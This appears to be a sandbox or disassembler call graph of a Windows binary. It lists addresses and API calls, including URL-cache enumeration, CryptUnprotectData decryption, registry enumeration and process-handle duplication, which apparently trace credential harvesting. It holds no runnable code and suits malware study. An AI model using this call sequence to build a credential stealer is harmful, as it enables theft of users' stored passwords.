38743 40ae8f 38740->38743 38741->38742 38745 40aeb6 38742->38745 38746 409d1f 6 API calls 38742->38746 38744 40aebe FindClose 38743->38744 38744->38742 38745->38340 38746->38745 38748 40aed1 38747->38748 38749 40aec7 FindClose 38747->38749 38748->38202 38749->38748 38751 4099d7 38750->38751 38752 4099da memcpy 38750->38752 38751->38752 38752->38259 38754 40b2cc 27 API calls 38753->38754 38755 44543f 38754->38755 38756 409d1f 6 API calls 38755->38756 38757 44544f 38756->38757 39667 409b98 GetFileAttributesW 38757->39667 38759 44545e 38760 445476 38759->38760 38761 40b6ef 249 API calls 38759->38761 38762 40b2cc 27 API calls 38760->38762 38761->38760 38763 445482 38762->38763 38764 409d1f 6 API calls 38763->38764 38765 445492 38764->38765 39668 409b98 GetFileAttributesW 38765->39668 38767 4454a1 38768 4454b9 38767->38768 38769 40b6ef 249 API calls 38767->38769 38768->38279 38769->38768 38770->38278 38771->38302 38772->38308 38773->38343 38774->38323 38775->38373 38776->38373 38777->38354 38778->38384 38779->38386 38780->38388 38782 414c2e 16 API calls 38781->38782 38783 40c2ae 38782->38783 38839 40c1d3 38783->38839 38788 40c3be 38805 40a8ab 38788->38805 38789 40afcf 2 API calls 38790 40c2fd FindFirstUrlCacheEntryW 38789->38790 38791 40c3b6 38790->38791 38792 40c31e wcschr 38790->38792 38793 40b04b ??3@YAXPAX 38791->38793 38794 40c331 38792->38794 38795 40c35e FindNextUrlCacheEntryW 38792->38795 38793->38788 38797 40a8ab 9 API calls 38794->38797 38795->38792 38796 40c373 GetLastError 38795->38796 38798 40c3ad FindCloseUrlCache 38796->38798 38799 40c37e 38796->38799 38800 40c33e wcschr 38797->38800 38798->38791 38801 40afcf 2 API calls 38799->38801 38800->38795 38802 40c34f 38800->38802 38803 40c391 FindNextUrlCacheEntryW 38801->38803 38804 40a8ab 9 API calls 38802->38804 38803->38792 38803->38798 38804->38795 38933 40a97a 38805->38933 38808 40a8cc 38808->38395 38809 40a8d0 7 API calls 38809->38808 38938 40b1ab ??3@YAXPAX ??3@YAXPAX 38810->38938 38812 40c3dd 38813 40b2cc 27 API calls 38812->38813 38814 40c3e7 38813->38814 38939 414592 RegOpenKeyExW 38814->38939 38816 40c3f4 38817 40c50e 38816->38817 38818 40c3ff 38816->38818 38832 405337 38817->38832 38819 40a9ce 4 API calls 38818->38819 38820 40c418 memset 38819->38820 38940 40aa1d 38820->38940 38823 40c471 38825 40c47a _wcsupr 38823->38825 38824 40c505 RegCloseKey 38824->38817 38826 40a8d0 7 API calls 38825->38826 38827 40c498 38826->38827 38828 40a8d0 7 API calls 38827->38828 38829 40c4ac memset 38828->38829 38830 40aa1d 38829->38830 38831 40c4e4 RegEnumValueW 38830->38831 38831->38824 38831->38825 38942 405220 38832->38942 38834 405340 38834->38409 38835->38406 38836->38408 38837->38409 38838->38402 38840 40ae18 9 API calls 38839->38840 38846 40c210 38840->38846 38841 40ae51 9 API calls 38841->38846 38842 40c264 38843 40aebe FindClose 38842->38843 38845 40c26f 38843->38845 38844 40add4 2 API calls 38844->38846 38851 40e5ed memset memset 38845->38851 38846->38841 38846->38842 38846->38844 38847 40c231 _wcsicmp 38846->38847 38848 40c1d3 34 API calls 38846->38848 38847->38846 38849 40c248 38847->38849 38848->38846 38864 40c084 21 API calls 38849->38864 38852 414c2e 16 API calls 38851->38852 38853 40e63f 38852->38853 38854 409d1f 6 API calls 38853->38854 38855 40e658 38854->38855 38865 409b98 GetFileAttributesW 38855->38865 38857 40e667 38858 409d1f 6 API calls 38857->38858 38860 40e680 38857->38860 38858->38860 38866 409b98 GetFileAttributesW 38860->38866 38861 40e68f 38862 40c2d8 38861->38862 38867 40e4b2 38861->38867 38862->38788 38862->38789 38864->38846 38865->38857 38866->38861 38888 40e01e 38867->38888 38869 40e593 38870 40e5b0 38869->38870 38871 40e59c DeleteFileW 38869->38871 38872 40b04b ??3@YAXPAX 38870->38872 38871->38870 38874 40e5bb 38872->38874 38873 40e521 38873->38869 38911 40e175 38873->38911 38876 40e5c4 CloseHandle 38874->38876 38877 40e5cc 38874->38877 38876->38877 38879 40b633 ??3@YAXPAX 38877->38879 38878 40e573 38880 40e584 38878->38880 38881 40e57c CloseHandle 38878->38881 38882 40e5db 38879->38882 38932 40b1ab ??3@YAXPAX ??3@YAXPAX 38880->38932 38881->38880 38883 40b633 ??3@YAXPAX 38882->38883 38885 40e5e3 38883->38885 38885->38862 38887 40e540 38887->38878 38931 40e2ab 30 API calls 38887->38931 38889 406214 22 API calls 38888->38889 38890 40e03c 38889->38890 38891 40e16b 38890->38891 38892 40dd85 60 API calls 38890->38892 38891->38873 38893 40e06b 38892->38893 38893->38891 38894 40afcf ??2@YAPAXI ??3@YAXPAX 38893->38894 38895 40e08d OpenProcess 38894->38895 38896 40e0a4 GetCurrentProcess DuplicateHandle 38895->38896 38900 40e152 38895->38900 38897 40e0d0 GetFileSize 38896->38897 38898 40e14a CloseHandle 38896->38898 38901 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38897->38901 38898->38900 38899 40e160 38903 40b04b ??3@YAXPAX 38899->38903 38900->38899 38902 406214 22 API calls 38900->38902 38904 40e0ea 38901->38904 38902->38899 38903->38891 38905 4096dc CreateFileW 38904->38905 38906 40e0f1 CreateFileMappingW 38905->38906 38907 40e140 CloseHandle CloseHandle 38906->38907 38908 40e10b MapViewOfFile 38906->38908 38907->38898 38909 40e13b CloseHandle 38908->38909 38910 40e11f WriteFile UnmapViewOfFile 38908->38910 38909->38907 38910->38909 38912 40e18c 38911->38912 38913 406b90 11 API calls 38912->38913 38914 40e19f 38913->38914 38915 40e1a7 memset 38914->38915 38916 40e299 38914->38916 38921 40e1e8 38915->38921 38917 4069a3 ??3@YAXPAX ??3@YAXPAX 38916->38917 38918 40e2a4 38917->38918 38918->38887 38919 406e8f 13 API calls 38919->38921 38920 406b53 SetFilePointerEx ReadFile 38920->38921 38921->38919 38921->38920 38922 40dd50 _wcsicmp 38921->38922 38923 40e283 38921->38923 38927 40742e 8 API calls 38921->38927 38928 40aae3 wcslen wcslen _memicmp 38921->38928 38929 40e244 _snwprintf 38921->38929 38922->38921 38924 40e291 38923->38924 38925 40e288 ??3@YAXPAX 38923->38925 38926 40aa04 ??3@YAXPAX 38924->38926 38925->38924 38926->38916 38927->38921 38928->38921 38930 40a8d0 7 API calls 38929->38930 38930->38921 38931->38887 38932->38869 38935 40a980 38933->38935 38934 40a8bb 38934->38808 38934->38809 38935->38934 38936 40a995 _wcsicmp 38935->38936 38937 40a99c wcscmp 38935->38937 38936->38935 38937->38935 38938->38812 38939->38816 38941 40aa23 RegEnumValueW 38940->38941 38941->38823 38941->38824 38943 40522a 38942->38943 38968 405329 38942->38968 38944 40b2cc 27 API calls 38943->38944 38945 405234 38944->38945 38946 40a804 8 API calls 38945->38946 38947 40523a 38946->38947 38969 40b273 38947->38969 38949 405248 _mbscpy _mbscat 38950 40526c 38949->38950 38951 40b273 27 API calls 38950->38951 38952 405279 38951->38952 38953 40b273 27 API calls 38952->38953 38954 40528f 38953->38954 38955 40b273 27 API calls 38954->38955 38956 4052a5 38955->38956 38957 40b273 27 API calls 38956->38957 38958 4052bb 38957->38958 38959 40b273 27 API calls 38958->38959 38960 4052d1 38959->38960 38961 40b273 27 API calls 38960->38961 38962 4052e7 38961->38962 38963 40b273 27 API calls 38962->38963 38964 4052fd 38963->38964 38965 40b273 27 API calls 38964->38965 38966 405313 38965->38966 38967 40b273 27 API calls 38966->38967 38967->38968 38968->38834 38970 40b58d 27 API calls 38969->38970 38971 40b18c 38970->38971 38971->38949 38973 40440c FreeLibrary 38972->38973 38974 40436d 38973->38974 38975 40a804 8 API calls 38974->38975 38976 404377 38975->38976 38977 4043f7 38976->38977 38978 40b273 27 API calls 38976->38978 38977->38416 38977->38418 38979 40438d 38978->38979 38980 40b273 27 API calls 38979->38980 38981 4043a7 38980->38981 38982 40b273 27 API calls 38981->38982 38983 4043ba 38982->38983 38984 40b273 27 API calls 38983->38984 38985 4043ce 38984->38985 38986 40b273 27 API calls 38985->38986 38987 4043e2 38986->38987 38987->38977 38988 40440c FreeLibrary 38987->38988 38988->38977 38990 404413 FreeLibrary 38989->38990 38991 40441e 38989->38991 38990->38991 38991->38429 38992->38426 38994 40447e 38993->38994 38995 40442e 38993->38995 38996 404485 CryptUnprotectData 38994->38996 38997 40449c 38994->38997 38998 40b2cc 27 API calls 38995->38998 38996->38997 38997->38426 38999 404438 38998->38999 39000 40a804 8 API calls 38999->39000 39001 40443e 39000->39001 39002 40444f 39001->39002 39003 40b273 27 API calls 39001->39003 39002->38994 39004 404475 FreeLibrary 39002->39004 39003->39002 39004->38994 39006 4135f6 39005->39006 39007 4135eb FreeLibrary 39005->39007 39006->38432 39007->39006 39009 4449c4 39008->39009 39027 444a48 39008->39027 39010 40b2cc 27 API calls 39009->39010 39011 4449cb 39010->39011 39012 40a804 8 API calls 39011->39012 39013 4449d1 39012->39013 39014 40b273 27 API calls 39013->39014 39015 4449dc 39014->39015 39016 40b273 27 API calls 39015->39016 39017 4449f3 39016->39017 39018 40b273 27 API calls 39017->39018 39019 444a04 39018->39019 39020 40b273 27 API calls 39019->39020 39021 444a15 39020->39021 39022 40b273 27 API calls 39021->39022 39023 444a26 39022->39023 39024 40b273 27 API calls 39023->39024 39025 444a37 39024->39025 39026 40b273 27 API calls 39025->39026 39026->39027 39027->38452 39027->38453 39028->38462 39029->38462 39030->38462 39031->38462 39032->38454 39034 403a29 39033->39034 39048 403bed memset memset 39034->39048 39036 403ae7 39061 40b1ab ??3@YAXPAX ??3@YAXPAX 39036->39061 39037 403a3f memset 39041 403a2f 39037->39041 39039 403aef 39039->38471 39040 409d1f 6 API calls 39040->39041 39041->39036 39041->39037 39041->39040 39042 409b98 GetFileAttributesW 39041->39042 39043 40a8d0 7 API calls 39041->39043 39042->39041 39043->39041 39045 40a051 GetFileTime CloseHandle 39044->39045 39046 4039ca CompareFileTime 39044->39046 39045->39046 39046->38471 39047->38470 39049 414c2e 16 API calls 39048->39049 39050 403c38 39049->39050 39051 409719 2 API calls 39050->39051 39052 403c3f wcscat 39051->39052 39053 414c2e 16 API calls 39052->39053 39054 403c61 39053->39054 39055 409719 2 API calls 39054->39055 39056 403c68 wcscat 39055->39056 39062 403af5 39056->39062 39059 403af5 20 API calls 39060 403c95 39059->39060 39060->39041 39061->39039 39063 403b02 39062->39063 39064 40ae18 9 API calls 39063->39064 39073 403b37 39064->39073 39065 403bdb 39067 40aebe FindClose 39065->39067 39066 40add4 wcscmp wcscmp 39066->39073 39068 403be6 39067->39068 39068->39059 39069 40a8d0 7 API calls 39069->39073 39070 40ae18 9 API calls 39070->39073 39071 40ae51 9 API calls 39071->39073 39072 40aebe FindClose 39072->39073 39073->39065 39073->39066 39073->39069 39073->39070 39073->39071 39073->39072 39075 409d1f 6 API calls 39074->39075 39076 404190 39075->39076 39089 409b98 GetFileAttributesW 39076->39089 39078 40419c 39079 4041a7 6 API calls 39078->39079 39080 40435c 39078->39080 39081 40424f 39079->39081 39080->38492 39081->39080 39083 40425e memset 39081->39083 39085 409d1f 6 API calls 39081->39085 39086 40a8ab 9 API calls 39081->39086 39090 414842 39081->39090 39083->39081 39084 404296 wcscpy 39083->39084 39084->39081 39085->39081 39087 4042b6 memset memset _snwprintf wcscpy 39086->39087 39087->39081 39088->38496 39089->39078 39093 41443e 39090->39093 39092 414866 39092->39081 39094 41444b 39093->39094 39095 414451 39094->39095 39096 4144a3 GetPrivateProfileStringW 39094->39096 39097 414491 39095->39097 39098 414455 wcschr 39095->39098 39096->39092 39100 414495 WritePrivateProfileStringW 39097->39100 39098->39097 39099 414463 _snwprintf 39098->39099 39099->39100 39100->39092 39101->38501 39103 40b2cc 27 API calls 39102->39103 39104 409615 39103->39104 39105 409d1f 6 API calls 39104->39105 39106 409625 39105->39106 39129 409b98 GetFileAttributesW 39106->39129 39108 409634 39109 409648 39108->39109 39146 4091b8 238 API calls 39108->39146 39111 40b2cc 27 API calls 39109->39111 39113 408801 39109->39113 39112 40965d 39111->39112 39114 409d1f 6 API calls 39112->39114 39113->38504 39113->38536 39115 40966d 39114->39115 39130 409b98 GetFileAttributesW 39115->39130 39117 40967c 39117->39113 39131 409529 39117->39131 39119->38526 39120->38536 39121->38531 39122->38536 39123->38537 39124->38538 39125->38542 39126->38544 39127->38547 39128->38536 39129->39108 39130->39117 39147 4096c3 CreateFileW 39131->39147 39133 409543 39134 4095cd 39133->39134 39135 409550 GetFileSize 39133->39135 39134->39113 39136 409577 CloseHandle 39135->39136 39137 40955f 39135->39137 39136->39134 39142 409585 39136->39142 39138 40afcf 2 API calls 39137->39138 39139 409569 39138->39139 39148 40a2ef ReadFile 39139->39148 39141 409574 39141->39136 39142->39134 39143 4095c3 39142->39143 39149 408b8d 38 API calls 39142->39149 39150 40908b 55 API calls 39143->39150 39146->39109 39147->39133 39148->39141 39149->39142 39150->39134 39178 413f4f 39151->39178 39154 413f37 K32GetModuleFileNameExW 39155 413f4a 39154->39155 39155->38565 39157 413969 wcscpy 39156->39157 39158 41396c wcschr 39156->39158 39170 413a3a 39157->39170 39158->39157 39160 41398e 39158->39160 39182 4097f7 wcslen wcslen _memicmp 39160->39182 39162 41399a 39163 4139a4 memset 39162->39163 39164 4139e6 39162->39164 39183 409dd5 GetWindowsDirectoryW wcscpy 39163->39183 39166 413a31 wcscpy 39164->39166 39167 4139ec memset 39164->39167 39166->39170 39184 409dd5 GetWindowsDirectoryW wcscpy 39167->39184 39168 4139c9 wcscpy wcscat 39168->39170 39170->38565 39171 413a11 memcpy wcscat 39171->39170 39173 413cb0 GetModuleHandleW 39172->39173 39174 413cda 39172->39174 39173->39174 39175 413cbf 39173->39175 39176 413ce3 GetProcessTimes 39174->39176 39177 413cf6 39174->39177 39175->39174 39176->38567 39177->38567 39179 413f54 39178->39179 39181 413f2f 39178->39181 39180 40a804 8 API calls 39179->39180 39180->39181 39181->39154 39181->39155 39182->39162 39183->39168 39184->39171 39185->38587 39186->38610 39188 409cf9 GetVersionExW 39187->39188 39189 409d0a 39187->39189 39188->39189 39189->38617 39189->38621 39190->38624 39191->38627 39192->38629 39193->38674 39195 40bba5 39194->39195 39310 40cc26 39195->39310 39198 40bd4b 39331 40cc0c 39198->39331 39203 40b2cc 27 API calls 39204 40bbef 39203->39204 39338 40ccf0 _wcsicmp 39204->39338 39206 40bbf5 39206->39198 39339 40ccb4 6 API calls 39206->39339 39208 40bc26 39209 40cf04 17 API calls 39208->39209 39210 40bc2e 39209->39210 39211 40bd43 39210->39211 39212 40b2cc 27 API calls 39210->39212 39213 40cc0c 4 API calls 39211->39213 39214 40bc40 39212->39214 39213->39198 39340 40ccf0 _wcsicmp 39214->39340 39216 40bc46 39216->39211 39217 40bc61 memset memset WideCharToMultiByte 39216->39217 39341 40103c strlen 39217->39341 39219 40bcc0 39220 40b273 27 API calls 39219->39220 39221 40bcd0 memcmp 39220->39221 39221->39211 39222 40bce2 39221->39222 39223 404423 37 API calls 39222->39223 39224 40bd10 39223->39224 39224->39211 39225 40bd3a LocalFree 39224->39225 39226 40bd1f memcpy 39224->39226 39225->39211 39226->39225 39227->38689 39401 4438b5 39228->39401 39230 44444c 39231 40b879 39230->39231 39415 415a6d 39230->39415 39231->38692 39231->38693 39234 444486 39236 4444b9 memcpy 39234->39236 39273 4444a4 39234->39273 39235 44469e 39235->39231 39466 443d90 110 API calls 39235->39466 39419 415258 39236->39419 39239 444524 39240 444541 39239->39240 39241 44452a 39239->39241 39422 444316 39240->39422 39456 416935 16 API calls 39241->39456 39245 444316 18 API calls 39246 444563 39245->39246 39247 444316 18 API calls 39246->39247 39248 44456f 39247->39248 39249 444316 18 API calls 39248->39249 39250 44457f 39249->39250 39250->39273 39436 432d4e 39250->39436 39253 444316 18 API calls 39254 4445b0 39253->39254 39440 41eed2 39254->39440 39256 4445cf 39257 4445d6 39256->39257 39258 4445ee 39256->39258 39457 416935 16 API calls 39257->39457 39458 43302c memset 39258->39458 39260 4445fa 39459 43302c memset 39260->39459 39263 444609 39263->39273 39460 416935 16 API calls 39263->39460 39265 444646 39461 434d4b 17 API calls 39265->39461 39267 44464d 39462 437655 16 API calls 39267->39462 39269 444653 39463 4442e6 11 API calls 39269->39463 39271 44465d 39271->39273 39464 416935 16 API calls 39271->39464 39465 4442e6 11 API calls 39273->39465 39504 438460 39274->39504 39276 40b8a4 39276->38699 39280 4251c4 39276->39280 39278 409a74 GetTempFileNameW 39277->39278 39279 409a66 GetWindowsDirectoryW 39277->39279 39278->38686 39279->39278 39601 424f07 11 API calls 39280->39601 39282 4251e4 39283 4251f7 39282->39283 39284 4251e8 39282->39284 39603 4250f8 39283->39603 39602 4446ea 11 API calls 39284->39602 39286 4251f2 39286->38724 39288 425209 39291 425249 39288->39291 39294 4250f8 126 API calls 39288->39294 39295 425287 39288->39295 39611 4384e9 134 API calls 39288->39611 39612 424f74 123 API calls 39288->39612 39291->39295 39613 424ff0 13 API calls 39291->39613 39294->39288 39615 415c7d 16 API calls 39295->39615 39296 425266 39296->39295 39614 415be9 memcpy 39296->39614 39298->38724 39299->38724 39300->38724 39301->38724 39302->38724 39303->38724 39304->38724 39305->38724 39306->38724 39307->38699 39308->38692 39309->38721 39342 4096c3 CreateFileW 39310->39342 39312 40cc34 39313 40cc3d GetFileSize 39312->39313 39314 40bbca 39312->39314 39315 40afcf 2 API calls 39313->39315 39314->39198 39322 40cf04 39314->39322 39316 40cc64 39315->39316 39343 40a2ef ReadFile 39316->39343 39318 40cc71 39344 40ab4a MultiByteToWideChar 39318->39344 39320 40cc95 CloseHandle 39321 40b04b ??3@YAXPAX 39320->39321 39321->39314 39323 40b633 ??3@YAXPAX 39322->39323 39324 40cf14 39323->39324 39350 40b1ab ??3@YAXPAX ??3@YAXPAX 39324->39350 39326 40bbdd 39326->39198 39326->39203 39327 40cf1b 39327->39326 39329 40cfef 39327->39329 39351 40cd4b 39327->39351 39330 40cd4b 14 API calls 39329->39330 39330->39326 39332 40b633 ??3@YAXPAX 39331->39332 39333 40cc15 39332->39333 39334 40aa04 ??3@YAXPAX 39333->39334 39335 40cc1d 39334->39335 39400 40b1ab ??3@YAXPAX ??3@YAXPAX 39335->39400 39337 40b7d4 memset CreateFileW 39337->38679 39337->38680 39338->39206 39339->39208 39340->39216 39341->39219 39342->39312 39343->39318 39345 40ab6b 39344->39345 39349 40ab93 39344->39349 39346 40a9ce 4 API calls 39345->39346 39347 40ab74 39346->39347 39348 40ab7c MultiByteToWideChar 39347->39348 39348->39349 39349->39320 39350->39327 39352 40cd7b 39351->39352 39385 40aa29 39352->39385 39354 40cef5 39355 40aa04 ??3@YAXPAX 39354->39355 39356 40cefd 39355->39356 39356->39327 39358 40aa29 6 API calls 39359 40ce1d 39358->39359 39360 40aa29 6 API calls 39359->39360 39361 40ce3e 39360->39361 39362 40ce6a 39361->39362 39393 40abb7 wcslen memmove 39361->39393 39363 40ce9f 39362->39363 39396 40abb7 wcslen memmove 39362->39396 39366 40a8d0 7 API calls 39363->39366 39369 40ceb5 39366->39369 39367 40ce56 39394 40aa71 wcslen 39367->39394 39368 40ce8b 39397 40aa71 wcslen 39368->39397 39375 40a8d0 7 API calls 39369->39375 39372 40ce5e 39395 40abb7 wcslen memmove 39372->39395 39373 40ce93 39398 40abb7 wcslen memmove 39373->39398 39377 40cecb 39375->39377 39399 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39377->39399 39379 40cedd 39380 40aa04 ??3@YAXPAX 39379->39380 39381 40cee5 39380->39381 39382 40aa04 ??3@YAXPAX 39381->39382 39383 40ceed 39382->39383 39384 40aa04 ??3@YAXPAX 39383->39384 39384->39354 39386 40aa33 39385->39386 39392 40aa63 39385->39392 39387 40aa44 39386->39387 39388 40aa38 wcslen 39386->39388 39389 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39387->39389 39388->39387 39390 40aa4d 39389->39390 39391 40aa51 memcpy 39390->39391 39390->39392 39391->39392 39392->39354 39392->39358 39393->39367 39394->39372 39395->39362 39396->39368 39397->39373 39398->39363 39399->39379 39400->39337 39402 4438d0 39401->39402 39412 4438c9 39401->39412 39467 415378 memcpy memcpy 39402->39467 39412->39230 39416 415a77 39415->39416 39417 415a8d 39416->39417 39418 415a7e memset 39416->39418 39417->39234 39418->39417 39420 4438b5 11 API calls 39419->39420 39421 41525d 39420->39421 39421->39239 39423 444328 39422->39423 39424 444423 39423->39424 39425 44434e 39423->39425 39470 4446ea 11 API calls 39424->39470 39426 432d4e 3 API calls 39425->39426 39428 44435a 39426->39428 39430 444375 39428->39430 39435 44438b 39428->39435 39429 432d4e 3 API calls 39431 4443ec 39429->39431 39468 416935 16 API calls 39430->39468 39433 444381 39431->39433 39469 416935 16 API calls 39431->39469 39433->39245 39435->39429 39437 432d58 39436->39437 39439 432d65 39436->39439 39471 432cc4 memset memset memcpy 39437->39471 39439->39253 39441 41eee2 39440->39441 39442 415a6d memset 39441->39442 39443 41ef23 39442->39443 39444 415a6d memset 39443->39444 39455 41ef2d 39443->39455 39445 41ef42 39444->39445 39449 41ef49 39445->39449 39472 41b7d9 39445->39472 39447 41ef66 39448 41ef74 memset 39447->39448 39447->39449 39450 41ef91 39448->39450 39453 41ef9e 39448->39453 39449->39455 39490 41b321 100 API calls 39449->39490 39486 41519d 39450->39486 39453->39449 39489 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39453->39489 39455->39256 39456->39273 39457->39273 39458->39260 39459->39263 39460->39265 39461->39267 39462->39269 39463->39271 39464->39273 39465->39235 39466->39231 39468->39433 39469->39433 39470->39433 39471->39439 39478 41b812 39472->39478 39473 415a6d memset 39474 41b8c2 39473->39474 39475 41b980 39474->39475 39476 41b902 memcpy memcpy memcpy memcpy memcpy 39474->39476 39481 41b849 39474->39481 39483 41b9ad 39475->39483 39492 4151e3 39475->39492 39476->39475 39478->39481 39485 41b884 39478->39485 39491 444706 11 API calls 39478->39491 39480 41ba12 39480->39481 39482 41ba32 memset 39480->39482 39481->39447 39482->39481 39483->39481 39495 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39483->39495 39485->39473 39485->39481 39496 4175ed 39486->39496 39489->39449 39490->39455 39491->39485 39494 41837f 54 API calls 39492->39494 39493 4151f9 39493->39483 39494->39493 39495->39480 39497 417570 SetFilePointer GetLastError GetLastError 39496->39497 39498 4175ff 39497->39498 39499 41760a ReadFile 39498->39499 39500 4151b3 39498->39500 39501 417637 39499->39501 39502 417627 GetLastError 39499->39502 39500->39453 39501->39500 39503 41763e memset 39501->39503 39502->39500 39503->39500 39516 41703f 39504->39516 39506 43847a 39507 43848a 39506->39507 39508 43847e 39506->39508 39523 438270 39507->39523 39553 4446ea 11 API calls 39508->39553 39513 4384bb 39514 438270 133 API calls 39513->39514 39515 438488 39514->39515 39515->39276 39517 417044 39516->39517 39518 41705c 39516->39518 39522 417055 39517->39522 39555 416760 11 API calls 39517->39555 39519 417075 39518->39519 39556 41707a 11 API calls 39518->39556 39519->39506 39522->39506 39557 415a91 39523->39557 39525 43828d 39526 438297 39525->39526 39527 438341 39525->39527 39529 4382d6 39525->39529 39600 415c7d 16 API calls 39526->39600 39561 44358f 39527->39561 39532 4382fb 39529->39532 39533 4382db 39529->39533 39531 438458 39531->39515 39554 424f26 122 API calls 39531->39554 39594 415c23 memcpy 39532->39594 39592 416935 16 API calls 39533->39592 39536 4382e9 39593 415c7d 16 API calls 39536->39593 39537 438305 39540 44358f 19 API calls 39537->39540 39542 438318 39537->39542 39539 438373 39546 438383 39539->39546 39595 4300e8 memset memset memcpy 39539->39595 39540->39542 39542->39539 39587 43819e 39542->39587 39544 4383f5 39549 438404 39544->39549 39550 43841c 39544->39550 39545 4383cd 39545->39544 39597 42453e 122 API calls 39545->39597 39546->39545 39596 415c23 memcpy 39546->39596 39598 416935 16 API calls 39549->39598 39599 416935 16 API calls 39550->39599 39553->39515 39554->39513 39555->39522 39556->39517 39558 415a9d 39557->39558 39559 415ab3 39558->39559 39560 415aa4 memset 39558->39560 39559->39525 39560->39559 39562 4435be 39561->39562 39563 443676 39562->39563 39566 4436ce 39562->39566 39569 442ff8 19 API calls 39562->39569 39571 44366c 39562->39571 39585 44360c 39562->39585 39564 443737 39563->39564 39567 442ff8 19 API calls 39563->39567 39570 443758 39563->39570 39568 442ff8 19 API calls 39564->39568 39565 441409 memset 39565->39570 39573 4165ff 11 API calls 39566->39573 39567->39564 39568->39570 39569->39562 39570->39565 39575 443775 39570->39575 39574 4169a7 11 API calls 39571->39574 39572 4437be 39576 416760 11 API calls 39572->39576 39577 4437de 39572->39577 39573->39563 39574->39563 39575->39572 39581 415c56 11 API calls 39575->39581 39576->39577 39578 42463b memset memcpy 39577->39578 39580 443801 39577->39580 39578->39580 39579 443826 39583 43bd08 memset 39579->39583 39580->39579 39582 43024d memset 39580->39582 39581->39572 39582->39579 39584 443837 39583->39584 39584->39585 39586 43024d memset 39584->39586 39585->39542 39586->39584 39588 438246 39587->39588 39590 4381ba 39587->39590 39588->39539 39589 41f432 109 API calls 39589->39590 39590->39588 39590->39589 39591 41f638 103 API calls 39590->39591 39591->39590 39592->39536 39593->39526 39594->39537 39595->39546 39596->39545 39597->39544 39598->39526 39599->39526 39600->39531 39601->39282 39602->39286 39604 425108 39603->39604 39610 42510d 39603->39610 39648 424f74 123 API calls 39604->39648 39607 42516e 39649 415c7d 16 API calls 39607->39649 39608 425115 39608->39288 39610->39608 39616 42569b 39610->39616 39611->39288 39612->39288 39613->39296 39614->39295 39615->39286 39627 4256f1 39616->39627 39644 4259c2 39616->39644 39621 4260dd 39661 424251 119 API calls 39621->39661 39622 429a4d 39629 429a66 39622->39629 39630 429a9b 39622->39630 39626 422aeb memset memcpy memcpy 39626->39627 39627->39622 39627->39626 39632 4260a1 39627->39632 39641 4259da 39627->39641 39642 429ac1 39627->39642 39627->39644 39647 425a38 39627->39647 39650 4227f0 memset memcpy 39627->39650 39651 422b84 15 API calls 39627->39651 39652 422b5d memset memcpy memcpy 39627->39652 39653 422640 13 API calls 39627->39653 39655 4241fc 11 API calls 39627->39655 39656 42413a 89 API calls 39627->39656 39662 415c56 11 API calls 39629->39662 39631 429a96 39630->39631 39664 416760 11 API calls 39630->39664 39665 424251 119 API calls 39631->39665 39659 415c56 11 API calls 39632->39659 39634 429a7a 39663 416760 11 API calls 39634->39663 39660 416760 11 API calls 39641->39660 39643 425ad6 39642->39643 39666 415c56 11 API calls 39642->39666 39643->39607 39644->39643 39654 415c56 11 API calls 39644->39654 39647->39644 39657 422640 13 API calls 39647->39657 39658 4226e0 12 API calls 39647->39658 39648->39610 39649->39608 39650->39627 39651->39627 39652->39627 39653->39627 39654->39641 39655->39627 39656->39627 39657->39647 39658->39647 39659->39641 39660->39621 39661->39643 39662->39634 39663->39631 39664->39631 39665->39642 39666->39641 39667->38759 39668->38767 39669 44dea5 39670 44deb5 FreeLibrary 39669->39670 39671 44dec3 39669->39671 39670->39671 39672 4147f3 39675 414561 39672->39675 39674 414813 39676 41456d 39675->39676 39677 41457f GetPrivateProfileIntW 39675->39677 39680 4143f1 memset _itow WritePrivateProfileStringW 39676->39680 39677->39674 39679 41457a 39679->39674 39680->39679 39681 44def7 39682 44df07 39681->39682 39683 44df00 ??3@YAXPAX 39681->39683 39684 44df17 39682->39684 39685 44df10 ??3@YAXPAX 39682->39685 39683->39682 39686 44df27 39684->39686 39687 44df20 ??3@YAXPAX 39684->39687 39685->39684 39688 44df37 39686->39688 39689 44df30 ??3@YAXPAX 39686->39689 39687->39686 39689->39688 39690 4287c1 39691 4287d2 39690->39691 39692 429ac1 39690->39692 39693 428818 39691->39693 39694 42881f 39691->39694 39709 425711 39691->39709 39704 425ad6 39692->39704 39760 415c56 11 API calls 39692->39760 39727 42013a 39693->39727 39755 420244 96 API calls 39694->39755 39698 4260dd 39754 424251 119 API calls 39698->39754 39702 4259da 39753 416760 11 API calls 39702->39753 39705 429a4d 39711 429a66 39705->39711 39712 429a9b 39705->39712 39708 422aeb memset memcpy memcpy 39708->39709 39709->39692 39709->39702 39709->39705 39709->39708 39714 4260a1 39709->39714 39723 4259c2 39709->39723 39726 425a38 39709->39726 39743 4227f0 memset memcpy 39709->39743 39744 422b84 15 API calls 39709->39744 39745 422b5d memset memcpy memcpy 39709->39745 39746 422640 13 API calls 39709->39746 39748 4241fc 11 API calls 39709->39748 39749 42413a 89 API calls 39709->39749 39756 415c56 11 API calls 39711->39756 39713 429a96 39712->39713 39758 416760 11 API calls 39712->39758 39759 424251 119 API calls 39713->39759 39752 415c56 11 API calls 39714->39752 39716 429a7a 39757 416760 11 API calls 39716->39757 39723->39704 39747 415c56 11 API calls 39723->39747 39726->39723 39750 422640 13 API calls 39726->39750 39751 4226e0 12 API calls 39726->39751 39728 42014c 39727->39728 39731 420151 39727->39731 39770 41e466 96 API calls 39728->39770 39730 420162 39730->39709 39731->39730 39732 4201b3 39731->39732 39733 420229 39731->39733 39734 4201b8 39732->39734 39735 4201dc 39732->39735 39733->39730 39736 41fd5e 85 API calls 39733->39736 39761 41fbdb 39734->39761 39735->39730 39740 4201ff 39735->39740 39767 41fc4c 39735->39767 39736->39730 39740->39730 39742 42013a 96 API calls 39740->39742 39742->39730 39743->39709 39744->39709 39745->39709 39746->39709 39747->39702 39748->39709 39749->39709 39750->39726 39751->39726 39752->39702 39753->39698 39754->39704 39755->39709 39756->39716 39757->39713 39758->39713 39759->39692 39760->39702 39762 41fbf8 39761->39762 39765 41fbf1 39761->39765 39775 41ee26 39762->39775 39766 41fc39 39765->39766 39785 4446ce 11 API calls 39765->39785 39766->39730 39771 41fd5e 39766->39771 